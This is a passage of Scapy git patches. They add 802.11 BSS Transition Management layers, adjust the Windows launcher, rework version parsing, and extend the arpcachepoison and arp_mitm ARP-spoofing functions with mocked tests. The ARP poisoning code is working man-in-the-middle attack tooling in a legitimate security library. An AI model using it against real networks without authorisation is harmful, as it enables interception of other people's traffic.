"Reject-BSS_termination_undesired", + "Reject-BSS_termination_delay_requested", + "Reject-STA_BSS_Transition_Candidate_List_provided", + "Reject-No_suitable_BSS_transition_candidates", + "Reject-Leaving_ESS" +] + + +class Dot11BSSTMResponse(Packet): + name = "BSS Transition Management Response" + fields_desc = [ + ByteField("token", 0), + ByteEnumField("status", 0, btm_status_code), + ByteField("termination_delay", 0), + ConditionalField( + MACField("target", ETHER_ANY), + lambda p: p.status == 0 + ), + ConditionalField( + PacketListField( + "neighbor_report", + NeighborReport(), + NeighborReport + ), + lambda p: p.status == 6 + ) + ] + + ################### # 802.11 Security # ################### @@ -1652,6 +1864,8 @@ class Dot11CCMP(Dot11Encrypted): bind_layers(PrismHeader, Dot11,) bind_layers(Dot11, LLC, type=2) bind_layers(Dot11QoS, LLC,) + +# 802.11-2016 9.2.4.1.3 Type and Subtype subfields bind_layers(Dot11, Dot11AssoReq, subtype=0, type=0) bind_layers(Dot11, Dot11AssoResp, subtype=1, type=0) bind_layers(Dot11, Dot11ReassoReq, subtype=2, type=0) @@ -1663,6 +1877,7 @@ class Dot11CCMP(Dot11Encrypted): bind_layers(Dot11, Dot11Disas, subtype=10, type=0) bind_layers(Dot11, Dot11Auth, subtype=11, type=0) bind_layers(Dot11, Dot11Deauth, subtype=12, type=0) +bind_layers(Dot11, Dot11Action, subtype=13, type=0) bind_layers(Dot11, Dot11Ack, subtype=13, type=1) bind_layers(Dot11Beacon, Dot11Elt,) bind_layers(Dot11AssoReq, Dot11Elt,) @@ -1675,6 +1890,9 @@ class Dot11CCMP(Dot11Encrypted): bind_layers(Dot11Elt, Dot11Elt,) bind_layers(Dot11TKIP, conf.raw_layer) bind_layers(Dot11CCMP, conf.raw_layer) +bind_layers(Dot11Action, Dot11WNM, category=0x0A) +bind_layers(Dot11WNM, Dot11BSSTMRequest, action=7) +bind_layers(Dot11WNM, Dot11BSSTMResponse, action=8) conf.l2types.register(DLT_IEEE802_11, Dot11) diff --git a/test/scapy/layers/dot11.uts b/test/scapy/layers/dot11.uts index df8dd1964a3..7a7eea86dc1 100644 --- a/test/scapy/layers/dot11.uts +++ b/test/scapy/layers/dot11.uts @@ -638,3 +638,62 @@ assert Dot11EltMicrosoftWPA(raw(Dot11EltMicrosoftWPA())).nb_akm_suites == 1 assert Dot11EltMicrosoftWPA(raw(Dot11EltMicrosoftWPA(akm_suites=[AKMSuite(suite="PSK")]))).nb_akm_suites == 1 assert Dot11EltMicrosoftWPA(raw(Dot11EltMicrosoftWPA(akm_suites=[AKMSuite(suite="PSK"), AKMSuite(suite="802.1X")]))).nb_akm_suites == 2 += Dot11BSSTMRequest - dissection + +pkt = RadioTap(b"\x00\x008\x00/@@\xa0 \x08\x00\xa0 \x08\x00\x00\x7f\x89&\x88\x00\x00\x00\x00\x10\x0c\xcc\x15@\x01\xe4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8f\xe7&\x88\x00\x00\x00\x00\x16\x00\x11\x03\xe4\x00\xde\x01\xd0\x00<\x00\x92U\x1f\xe9g9J\xf2\x1c\x03)\x89J\xf2\x1c\x03)\x89\xc0\xce\n\x07\x01\x05\x05\x00\xff4\x10F\xf2\x1c\x03)\x89\x00\x00\x00\x00Q\x0b\x00\x03\x01\xff\xaaV\xdaY") +assert Dot11BSSTMRequest in pkt + +assert pkt[Dot11Action].category == 10 +assert pkt[Dot11Action][Dot11WNM].action == 7 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMRequest].token == 1 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMRequest].mode.Preferred_Candidate_List_Included +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMRequest].mode.Disassociation_Imminent +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMRequest].disassociation_timer == 5 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMRequest].validity_interval == 255 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMRequest].neighbor_report[0].type == 52 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMRequest].neighbor_report[0].len == 16 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMRequest].neighbor_report[0].BSSID == "46:f2:1c:03:29:89" +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMRequest].neighbor_report[0].AP_reach == 0 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMRequest].neighbor_report[0].security == 0 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMRequest].neighbor_report[0].key_scope == 0 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMRequest].neighbor_report[0].capabilities == 0 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMRequest].neighbor_report[0].mobility == 0 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMRequest].neighbor_report[0].HT == 0 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMRequest].neighbor_report[0].VHT == 0 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMRequest].neighbor_report[0].FTM == 0 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMRequest].neighbor_report[0].reserved == 0 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMRequest].neighbor_report[0].op_class == 81 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMRequest].neighbor_report[0].channel == 11 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMRequest].neighbor_report[0].phy_type == 0 + += Dot11BSSTMResponse - dissection + +pkt = RadioTap(b"\x00\x00,\x00\xae@\x00\xa0 \x08\x00\xa0 \x08\x00\xa0 \x08\x00\xa0 \x08\x00\x00\x10\x0c<\x14@\x01\xce\x00d\x00\x00\x00\xd0\x00\xca\x01\xca\x02\xcc\x03\xd0\x00<\x00df$J\xe1\xc4\xa0\xcc+\xbe\xc9Odf$J\xe1\xc4p\x0c\n\x08\x01\x06\x004\rdf$J\xe1\xc3\x00\x00\x00\x00\x04\x0c\x00<\xdd\xdf=") +assert Dot11BSSTMResponse in pkt + +assert pkt[Dot11Action].category == 10 +assert pkt[Dot11Action][Dot11WNM].action == 8 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMResponse].token == 1 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMResponse].status == 6 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMResponse].termination_delay == 0 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMResponse].neighbor_report[0].type == 52 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMResponse].neighbor_report[0].len == 13 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMResponse].neighbor_report[0].BSSID == "64:66:24:4a:e1:c3" +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMResponse].neighbor_report[0].AP_reach == 0 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMResponse].neighbor_report[0].security == 0 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMResponse].neighbor_report[0].key_scope == 0 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMResponse].neighbor_report[0].capabilities == 0 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMResponse].neighbor_report[0].mobility == 0 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMResponse].neighbor_report[0].HT == 0 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMResponse].neighbor_report[0].VHT == 0 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMResponse].neighbor_report[0].FTM == 0 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMResponse].neighbor_report[0].reserved == 0 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMResponse].neighbor_report[0].op_class == 4 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMResponse].neighbor_report[0].channel == 12 +assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMResponse].neighbor_report[0].phy_type == 0 + += Dot11Ack + +pkt = Dot11(bytes(Dot11()/Dot11Ack())) +assert pkt.subtype == 13 +assert pkt.type == 1 \ No newline at end of file From 5f0bb6c43530dcb2e1fb21d810cba9297e7ba1ca Mon Sep 17 00:00:00 2001 From: "Dr. Matthias St. Pierre" Date: Sun, 11 Dec 2022 07:57:56 +0100 Subject: [PATCH 0962/1632] run_scapy: prefer the Python Launcher on Windows Use the Python Launcher py.exe if it is found and let it handle the -2/-3 argument. Also add a 'setlocal' to prevent the script from messing with the callers variables. Fixes #3818 --- run_scapy.bat | 23 ++++++++++++++++++----- 1 file changed, 18 insertions(+), 5 deletions(-) diff --git a/run_scapy.bat b/run_scapy.bat index 11c73621a8d..14e71c61c28 100644 --- a/run_scapy.bat +++ b/run_scapy.bat @@ -1,17 +1,30 @@ @echo off +setlocal set PYTHONPATH=%~dp0 REM shift will not work with %* set "_args=%*" +IF "%PYTHON%" == "" set PYTHON=py +WHERE %PYTHON% >nul 2>&1 +IF %ERRORLEVEL% NEQ 0 set PYTHON= IF "%1" == "-2" ( - set PYTHON=python + if "%PYTHON%" == "py" ( + set "PYTHON=py -2" + ) else ( + set PYTHON=python + ) set "_args=%_args:~3%" ) ELSE IF "%1" == "-3" ( - set PYTHON=python3 + if "%PYTHON%" == "py" ( + set "PYTHON=py -3" + ) else ( + set PYTHON=python3 + ) set "_args=%_args:~3%" +) else ( + IF "%PYTHON%" == "" set PYTHON=python3 + WHERE %PYTHON% >nul 2>&1 + IF %ERRORLEVEL% NEQ 0 set PYTHON=python ) -IF "%PYTHON%" == "" set PYTHON=python3 -WHERE %PYTHON% >nul 2>&1 -IF %ERRORLEVEL% NEQ 0 set PYTHON=python %PYTHON% -m scapy %_args% title Scapy - dead PAUSE \ No newline at end of file From 2298bcce63b6be0948c0eefb940862a665ccc5dd Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 11 Dec 2022 21:28:12 +0100 Subject: [PATCH 0963/1632] Slightly improve ARP poisoning utils Co-authored-by: Pierre Lalet --- scapy/layers/l2.py | 108 ++++++++++++++++++++++++++------------- test/scapy/layers/l2.uts | 106 ++++++++++++++++++++++++++++++++++++++ 2 files changed, 179 insertions(+), 35 deletions(-) diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index 7658450e80b..48e903d971f 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -7,9 +7,10 @@ Classes and functions for layer 2 protocols. """ +import itertools +import socket import struct import time -import socket from scapy.ansmachine import AnsweringMachine from scapy.arch import get_if_addr, get_if_hwaddr @@ -65,6 +66,7 @@ Any, Callable, Dict, + Iterable, List, Optional, Tuple, @@ -737,11 +739,12 @@ def arpcachepoison( """Poison targets' ARP cache :param target: Can be an IP, subnet (string) or a list of IPs. This lists the IPs - or subnets that will be poisoned. + or the subnet that will be poisoned. :param addresses: Can be either a string, a tuple of a list of tuples. - If it's a string, it's the IP to usurpate in the victim, + If it's a string, it's the IP to advertise to the victim, with the local interface's MAC. If it's a tuple, - it's ("IP", "MAC"). It it's a list, it's [("IP", "MAC")] + it's ("IP", "MAC"). It it's a list, it's [("IP", "MAC")]. + "IP" can be a subnet of course. Examples for target "192.168.0.2":: @@ -767,7 +770,7 @@ def arpcachepoison( couple_list = addresses p = [ Ether(src=y) / ARP(op="who-has", psrc=x, pdst=targets, - hwsrc=y, hwdst="ff:ff:ff:ff:ff:ff") + hwsrc=y, hwdst="00:00:00:00:00:00") for x, y in couple_list ] try: @@ -782,19 +785,21 @@ def arpcachepoison( def arp_mitm( ip1, # type: str ip2, # type: str - mac1=None, # type: Optional[str] - mac2=None, # type: Optional[str] + mac1=None, # type: Optional[Union[str, List[str]]] + mac2=None, # type: Optional[Union[str, List[str]]] + broadcast=False, # type: bool target_mac=None, # type: Optional[str] iface=None, # type: Optional[_GlobInterfaceType] inter=3, # type: int ): # type: (...) -> None - """ARP MitM: poison 2 target's ARP cache + r"""ARP MitM: poison 2 target's ARP cache :param ip1: IPv4 of the first machine :param ip2: IPv4 of the second machine :param mac1: MAC of the first machine (optional: will ARP otherwise) :param mac2: MAC of the second machine (optional: will ARP otherwise) + :param broadcast: if True, will use broadcast mac for MitM by default :param target_mac: MAC of the attacker (optional: default to the interface's one) :param iface: the network interface. (optional: default, route for ip1) @@ -805,33 +810,59 @@ def arp_mitm( $ sudo scapy >>> arp_mitm("192.168.122.156", "192.168.122.17") + Alternative usages: + >>> arp_mitm("10.0.0.1", "10.1.1.0/21", iface="eth1") + >>> arp_mitm("10.0.0.1", "10.1.1.2", + ... target_mac="aa:aa:aa:aa:aa:aa", + ... mac2="00:1e:eb:bf:c1:ab") + + .. warning:: + If using a subnet, this will first perform an arping, unless broadcast is on! + Remember to change the sysctl settings back.. """ if not iface: iface = conf.route.route(ip1)[0] if not target_mac: target_mac = get_if_hwaddr(iface) - if mac1 is None: - mac1 = getmacbyip(ip1) - if not mac1: - print("Can't resolve mac for %s" % ip1) - return - if mac2 is None: - mac2 = getmacbyip(ip2) - if not mac2: - print("Can't resolve mac for %s" % ip2) - return - print("MITM on %s: %s <--> %s <--> %s" % (iface, mac1, target_mac, mac2)) + + def _tups(ip, mac): + # type: (str, Optional[Union[str, List[str]]]) -> Iterable[Tuple[str, str]] + if mac is None: + if broadcast: + # ip can be a Net/list/etc and will be iterated upon while sending + return [(ip, "ff:ff:ff:ff:ff:ff")] + return [(x.query.pdst, x.answer.hwsrc) + for x in arping(ip, verbose=0)[0]] + elif isinstance(mac, list): + return [(ip, x) for x in mac] + else: + return [(ip, mac)] + + tup1 = _tups(ip1, mac1) + if not tup1: + raise OSError(f"Could not resolve {ip1}") + tup2 = _tups(ip2, mac2) + if not tup2: + raise OSError(f"Could not resolve {ip2}") + print(f"MITM on {iface}: %s <--> {target_mac} <--> %s" % ( + [x[1] for x in tup1], + [x[1] for x in tup2], + )) # We loop who-has requests srploop( - [ - Ether(dst=mac1, src=target_mac) / - ARP(op="who-has", psrc=ip2, pdst=ip1, - hwsrc=target_mac, hwdst="ff:ff:ff:ff:ff:ff"), - Ether(dst=mac2, src=target_mac) / - ARP(op="who-has", psrc=ip1, pdst=ip2, - hwsrc=target_mac, hwdst="ff:ff:ff:ff:ff:ff") - ], + list(itertools.chain( + (Ether(dst=maca, src=target_mac) / + ARP(op="who-has", psrc=ipb, pdst=ipa, + hwsrc=target_mac, hwdst="00:00:00:00:00:00") + for ipa, maca in tup1 + for ipb, _ in tup2), + (Ether(dst=macb, src=target_mac) / + ARP(op="who-has", psrc=ipa, pdst=ipb, + hwsrc=target_mac, hwdst="00:00:00:00:00:00") + for ipb, macb in tup2 + for ipa, _ in tup1), + )), filter="arp and arp[7] = 2", inter=inter, iface=iface, @@ -840,14 +871,21 @@ def arp_mitm( store=0, ) print("Restoring...") - sendp([ - Ether(dst=mac1, src=target_mac) / - ARP(op="who-has", psrc=ip2, pdst=ip1, - hwsrc=mac2, hwdst="ff:ff:ff:ff:ff:ff"), - Ether(dst=mac2, src=target_mac) / - ARP(op="who-has", psrc=ip1, pdst=ip2, - hwsrc=mac1, hwdst="ff:ff:ff:ff:ff:ff") - ], iface=iface) + sendp( + list(itertools.chain( + (Ether(dst=maca, src=macb) / + ARP(op="who-has", psrc=ipb, pdst=ipa, + hwsrc=macb, hwdst="00:00:00:00:00:00") + for ipa, maca in tup1 + for ipb, macb in tup2), + (Ether(dst=macb, src=maca) / + ARP(op="who-has", psrc=ipa, pdst=ipb, + hwsrc=maca, hwdst="00:00:00:00:00:00") + for ipb, macb in tup2 + for ipa, maca in tup1), + )), + iface=iface + ) class ARPingResult(SndRcvList): diff --git a/test/scapy/layers/l2.uts b/test/scapy/layers/l2.uts index 6e1ac984aa7..b13b82bc676 100644 --- a/test/scapy/layers/l2.uts +++ b/test/scapy/layers/l2.uts @@ -27,6 +27,112 @@ with ContextManagerCaptureOutput() as cmco: assert result_ar.startswith(" 70:ee:50:50:ee:70 Netatmo 192.168.0.1") += arp_mitm - IP to IP +~ arp_mitm + +from scapy.plist import QueryAnswer + +srp_step = 0 + +def srp_spoof(x, *args, **kwargs): + global srp_step + assert x.dst == "ff:ff:ff:ff:ff:ff" + if srp_step == 0: + assert x.pdst == "192.168.0.1" + ans = Ether(src="cc:cc:cc:cc:cc:cc", dst=x.src)/ARP(hwsrc="cc:cc:cc:cc:cc:cc", hwdst=x.hwsrc, psrc=x.pdst, pdst=x.psrc) + elif srp_step == 1: + assert x.pdst == "192.168.0.2" + ans = Ether(src="bb:bb:bb:bb:bb:bb", dst=x.src)/ARP(hwsrc="bb:bb:bb:bb:bb:bb", hwdst=x.hwsrc, psrc=x.pdst, pdst=x.psrc) + else: + assert False + srp_step += 1 + return SndRcvList([QueryAnswer(x, ans)]), PacketList() + +srploop_step = 0 + +def srploop_spoof(x, *args, **kwargs): + assert len(x) == 2 + assert x[0].dst == "cc:cc:cc:cc:cc:cc" + assert x[0].src == x[0].hwsrc == "aa:aa:aa:aa:aa:aa" + assert x[0].hwdst == "00:00:00:00:00:00" + assert x[0].psrc == "192.168.0.2" + assert x[0].pdst == "192.168.0.1" + assert x[1].dst == "bb:bb:bb:bb:bb:bb" + assert x[1].src == x[1].hwsrc == "aa:aa:aa:aa:aa:aa" + assert x[1].hwdst == "00:00:00:00:00:00" + assert x[1].psrc == "192.168.0.1" + assert x[1].pdst == "192.168.0.2" + +def sendp_spoof(x, *args, **kwargs): + assert len(x) == 2 + assert x[0].dst == "cc:cc:cc:cc:cc:cc" + assert x[0].src == x[0].hwsrc == "bb:bb:bb:bb:bb:bb" + assert x[0].hwdst == "00:00:00:00:00:00" + assert x[0].psrc == "192.168.0.2" + assert x[0].pdst == "192.168.0.1" + assert x[1].dst == "bb:bb:bb:bb:bb:bb" + assert x[1].src == x[1].hwsrc == "cc:cc:cc:cc:cc:cc" + assert x[1].hwdst == "00:00:00:00:00:00" + assert x[1].psrc == "192.168.0.1" + assert x[1].pdst == "192.168.0.2" + +import mock +with mock.patch('scapy.layers.l2.srp', side_effect=srp_spoof), \ + mock.patch('scapy.layers.l2.srploop', side_effect=srploop_spoof), \ + mock.patch('scapy.layers.l2.sendp', side_effect=sendp_spoof): + arp_mitm( + "192.168.0.1", + "192.168.0.2", + target_mac='aa:aa:aa:aa:aa:aa', + ) + += arp_mitm - IP to range +~ arp_mitm + +from scapy.plist import QueryAnswer + +def srp_spoof(x, *args, **kwargs): + assert x.dst == "ff:ff:ff:ff:ff:ff" + assert x.pdst == Net("192.168.0.2/24") + ans = Ether(src="cc:cc:cc:cc:cc:cc", dst=x.src)/ARP(hwsrc="cc:cc:cc:cc:cc:cc", hwdst=x.hwsrc, psrc=x.pdst, pdst=x.psrc) + return SndRcvList([ + QueryAnswer(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.0.2"), Ether(src="cc:cc:cc:cc:cc:cc", dst=x.src)/ARP(hwsrc="cc:cc:cc:cc:cc:cc", psrc="192.168.0.2", pdst="192.168.0.1")), + QueryAnswer(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.0.9"), Ether(src="11:11:11:11:11:11", dst=x.src)/ARP(hwsrc="11:11:11:11:11:11", psrc="192.168.0.9", pdst="192.168.0.1")), + QueryAnswer(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.0.17"), Ether(src="22:22:22:22:22:22", dst=x.src)/ARP(hwsrc="22:22:22:22:22:22", psrc="192.168.0.17", pdst="192.168.0.1")), + ]), PacketList() + +srploop_step = 0 + +def srploop_spoof(x, *args, **kwargs): + assert len(x) == 12 + assert [bytes(y) for y in x] == [ + b'\xdd\xdd\xdd\xdd\xdd\xdd\xaa\xaa\xaa\xaa\xaa\xaa\x08\x06\x00\x01\x08\x00\x06\x04\x00\x01\xaa\xaa\xaa\xaa\xaa\xaa\xc0\xa8\x00\x02\x00\x00\x00\x00\x00\x00\xc0\xa8\x00\x01', + b'\xdd\xdd\xdd\xdd\xdd\xdd\xaa\xaa\xaa\xaa\xaa\xaa\x08\x06\x00\x01\x08\x00\x06\x04\x00\x01\xaa\xaa\xaa\xaa\xaa\xaa\xc0\xa8\x00\t\x00\x00\x00\x00\x00\x00\xc0\xa8\x00\x01', + b'\xdd\xdd\xdd\xdd\xdd\xdd\xaa\xaa\xaa\xaa\xaa\xaa\x08\x06\x00\x01\x08\x00\x06\x04\x00\x01\xaa\xaa\xaa\xaa\xaa\xaa\xc0\xa8\x00\x11\x00\x00\x00\x00\x00\x00\xc0\xa8\x00\x01', + b'\xee\xee\xee\xee\xee\xee\xaa\xaa\xaa\xaa\xaa\xaa\x08\x06\x00\x01\x08\x00\x06\x04\x00\x01\xaa\xaa\xaa\xaa\xaa\xaa\xc0\xa8\x00\x02\x00\x00\x00\x00\x00\x00\xc0\xa8\x00\x01', + b'\xee\xee\xee\xee\xee\xee\xaa\xaa\xaa\xaa\xaa\xaa\x08\x06\x00\x01\x08\x00\x06\x04\x00\x01\xaa\xaa\xaa\xaa\xaa\xaa\xc0\xa8\x00\t\x00\x00\x00\x00\x00\x00\xc0\xa8\x00\x01', + b'\xee\xee\xee\xee\xee\xee\xaa\xaa\xaa\xaa\xaa\xaa\x08\x06\x00\x01\x08\x00\x06\x04\x00\x01\xaa\xaa\xaa\xaa\xaa\xaa\xc0\xa8\x00\x11\x00\x00\x00\x00\x00\x00\xc0\xa8\x00\x01', + b'\xcc\xcc\xcc\xcc\xcc\xcc\xaa\xaa\xaa\xaa\xaa\xaa\x08\x06\x00\x01\x08\x00\x06\x04\x00\x01\xaa\xaa\xaa\xaa\xaa\xaa\xc0\xa8\x00\x01\x00\x00\x00\x00\x00\x00\xc0\xa8\x00\x02', + b'\xcc\xcc\xcc\xcc\xcc\xcc\xaa\xaa\xaa\xaa\xaa\xaa\x08\x06\x00\x01\x08\x00\x06\x04\x00\x01\xaa\xaa\xaa\xaa\xaa\xaa\xc0\xa8\x00\x01\x00\x00\x00\x00\x00\x00\xc0\xa8\x00\x02', + b'\x11\x11\x11\x11\x11\x11\xaa\xaa\xaa\xaa\xaa\xaa\x08\x06\x00\x01\x08\x00\x06\x04\x00\x01\xaa\xaa\xaa\xaa\xaa\xaa\xc0\xa8\x00\x01\x00\x00\x00\x00\x00\x00\xc0\xa8\x00\t', + b'\x11\x11\x11\x11\x11\x11\xaa\xaa\xaa\xaa\xaa\xaa\x08\x06\x00\x01\x08\x00\x06\x04\x00\x01\xaa\xaa\xaa\xaa\xaa\xaa\xc0\xa8\x00\x01\x00\x00\x00\x00\x00\x00\xc0\xa8\x00\t', + b'""""""\xaa\xaa\xaa\xaa\xaa\xaa\x08\x06\x00\x01\x08\x00\x06\x04\x00\x01\xaa\xaa\xaa\xaa\xaa\xaa\xc0\xa8\x00\x01\x00\x00\x00\x00\x00\x00\xc0\xa8\x00\x11', + b'""""""\xaa\xaa\xaa\xaa\xaa\xaa\x08\x06\x00\x01\x08\x00\x06\x04\x00\x01\xaa\xaa\xaa\xaa\xaa\xaa\xc0\xa8\x00\x01\x00\x00\x00\x00\x00\x00\xc0\xa8\x00\x11' + ] + +def sendp_spoof(x, *args, **kwargs): + pass + +import mock +with mock.patch('scapy.layers.l2.srp', side_effect=srp_spoof), \ + mock.patch('scapy.layers.l2.srploop', side_effect=srploop_spoof), \ + mock.patch('scapy.layers.l2.sendp', side_effect=sendp_spoof): + arp_mitm( + "192.168.0.1", + "192.168.0.2/24", + mac1=["dd:dd:dd:dd:dd:dd", "ee:ee:ee:ee:ee:ee"], + target_mac='aa:aa:aa:aa:aa:aa', + ) ############ ############ From 915fe2d207b0f91768de2a25d576767a4cf2efaf Mon Sep 17 00:00:00 2001 From: Robin Jarry Date: Mon, 13 Feb 2023 18:08:41 +0100 Subject: [PATCH 0964/1632] setup: sanitize package version (#3862) * setup: sanitize package version Currently, when installing from a non-tagged git archive version we get an error from pkg_resources: pkg_resources.extern.packaging.version.InvalidVersion: Invalid version: 'git-archive.dev95ba5b8504' This version does not comply with the PEP 440 standard. Update the parsing of git-archive %(describe) placeholder by adding multiple safeguards for computing scapy.VERSION (the first successful method is used in priority): 1) If the SCAPY_VERSION env var is defined, use it. This will allow downstream packaging to force a specific version even if they store scapy in a different repository using a different git tag scheme. 2) If the scapy/VERSION file exists, use its contents. 3) Try to parse a tag from a git archive %(describe) placeholder. If the git archive was not made on a tag, use the commit timestamp to convert it to a date YYYY.MM.DD which is PEP 440 compatible. 4) Try to use git describe to generate a tag. 5) Use the last modification date of scapy/__init__.py and generate a date YYYY.MM.DD which is PEP 440 compatible. 6) Return 0.0.0 Do not try to generate the scapy/VERSION file when importing scapy anymore but generate it by overriding the sdist command in setup.py and write it to the temp folder used for the source archive generation. Update unit tests to ensure that order of priority is enforced. Link: https://peps.python.org/pep-0440/ Link: https://bugzilla.redhat.com/show_bug.cgi?id=2162667 Signed-off-by: Robin Jarry * Reject invalid git tags --------- Signed-off-by: Robin Jarry Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> --- .gitignore | 1 - scapy/__init__.py | 93 +++++++++++++++++++++++++++++---------------- setup.py | 15 ++++++-- test/regression.uts | 32 +++++++++++----- 4 files changed, 95 insertions(+), 46 deletions(-) diff --git a/.gitignore b/.gitignore index 34b606d3ceb..fa3030f1bb2 100644 --- a/.gitignore +++ b/.gitignore @@ -4,7 +4,6 @@ dist/ build/ MANIFEST *.egg-info/ -scapy/VERSION test/*.html .coverage* .tox diff --git a/scapy/__init__.py b/scapy/__init__.py index 10739ec6200..72f73fd1f66 100644 --- a/scapy/__init__.py +++ b/scapy/__init__.py @@ -10,6 +10,7 @@ https://scapy.net """ +import datetime import os import re import subprocess @@ -31,8 +32,36 @@ def _parse_tag(tag): # remove the 'v' prefix and add a '.devN' suffix return '%s.dev%s' % (match.group(1), match.group(2)) else: - # just remove the 'v' prefix - return re.sub('^v', '', tag) + raise ValueError('tag has invalid format') + + +def _version_from_git_archive(): + # type: () -> str + """ + Rely on git archive "export-subst" git attribute. + See 'man gitattributes' for more details. + Note: describe is only supported with git >= 2.32.0 + but we use it to workaround GH#3121 + """ + git_archive_id = '$Format:%ct %(describe)$'.strip().split() + tstamp = git_archive_id[0] + tag = git_archive_id[1] + + if "Format" in tstamp: + raise ValueError('not a git archive') + + if "describe" in tag: + # git is too old! + tag = "" + if tag: + # archived revision is tagged, use the tag + return _parse_tag(tag) + elif tstamp: + # archived revision is not tagged, use the commit date + d = datetime.datetime.utcfromtimestamp(int(tstamp)) + return d.strftime('%Y.%m.%d') + + raise ValueError("invalid git archive format") def _version_from_git_describe(): @@ -91,40 +120,40 @@ def _version(): :return: the Scapy version """ - # Rely on git archive "export-subst" git attribute. - # See 'man gitattributes' for more details. - # Note: describe is only supported with git >= 2.32.0 - # but we use it to workaround GH#3121 - git_archive_id = '$Format:%h %(describe)$'.strip().split() - sha1 = git_archive_id[0] - tag = git_archive_id[1] - if "Format" not in sha1: - # We are in a git archive - if "describe" in tag: - # git is too old! - tag = "" - if tag: - return _parse_tag(tag) - elif sha1: - return "git-archive." + sha1 - return 'unknown.version' - # Fallback to calling git + try: + # possibly forced by external packaging + return os.environ['SCAPY_VERSION'] + except KeyError: + pass + version_file = os.path.join(_SCAPY_PKG_DIR, 'VERSION') try: - tag = _version_from_git_describe() - # successfully read the tag from git, write it in VERSION for - # installation and/or archive generation. - with open(version_file, 'w') as fdesc: - fdesc.write(tag) + # file generated when running sdist + with open(version_file, 'r') as fdsec: + tag = fdsec.read() return tag + except FileNotFoundError: + pass + + try: + return _version_from_git_archive() + except ValueError: + pass + + try: + return _version_from_git_describe() except Exception: - # failed to read the tag from git, try to read it from a VERSION file - try: - with open(version_file, 'r') as fdsec: - tag = fdsec.read() - return tag - except Exception: - return 'unknown.version' + pass + + try: + # last resort, use the modification date of __init__.py + d = datetime.datetime.utcfromtimestamp(os.path.getmtime(__file__)) + return d.strftime('%Y.%m.%d') + except Exception: + pass + + # all hope is lost + return '0.0.0' VERSION = __version__ = _version() diff --git a/setup.py b/setup.py index 7b60df5bd9c..aec60fb6e5c 100755 --- a/setup.py +++ b/setup.py @@ -6,6 +6,7 @@ try: from setuptools import setup, find_packages + from setuptools.command.sdist import sdist except: raise ImportError("setuptools is required to install scapy !") import io @@ -29,15 +30,23 @@ def process_ignore_tags(buffer): return None +class SDist(sdist): + + def make_release_tree(self, base_dir, files): + sdist.make_release_tree(self, base_dir, files) + # ensure there's a scapy/VERSION file + fn = os.path.join(base_dir, 'scapy', 'VERSION') + with open(fn, 'w') as f: + f.write(__import__('scapy').VERSION) + + # https://packaging.python.org/guides/distributing-packages-using-setuptools/ setup( name='scapy', version=__import__('scapy').VERSION, packages=find_packages(exclude=["test"]), data_files=[('share/man/man1', ["doc/scapy.1"])], - package_data={ - 'scapy': ['VERSION'], - }, + cmdclass={'sdist': SDist}, # Build starting scripts automatically entry_points={ 'console_scripts': [ diff --git a/test/regression.uts b/test/regression.uts index 1c0b42b9d65..4bbc4315aa4 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -4762,22 +4762,34 @@ assert pl[1][Ether].dst == '00:22:33:44:55:66' = _version() import os -version_filename = os.path.join(scapy._SCAPY_PKG_DIR, "VERSION") +from datetime import datetime +version_filename = os.path.join(scapy._SCAPY_PKG_DIR, "VERSION") +mtime = datetime.utcfromtimestamp(os.path.getmtime(scapy.__file__)) version = "2.0.0" with open(version_filename, "w") as fd: fd.write(version) +os.environ["SCAPY_VERSION"] = "9.9.9" +assert scapy._version() == "9.9.9" +del os.environ["SCAPY_VERSION"] + +assert scapy._version() == version +os.unlink(version_filename) + import mock -with mock.patch("scapy._version_from_git_describe") as version_mocked: - with mock.patch('scapy.os.path.isdir', return_value=True): - version_mocked.side_effect = Exception() - # mocking _parse_tag is a fallback for when run outside of git - with mock.patch('scapy._parse_tag', return_value=version): - assert scapy._version() 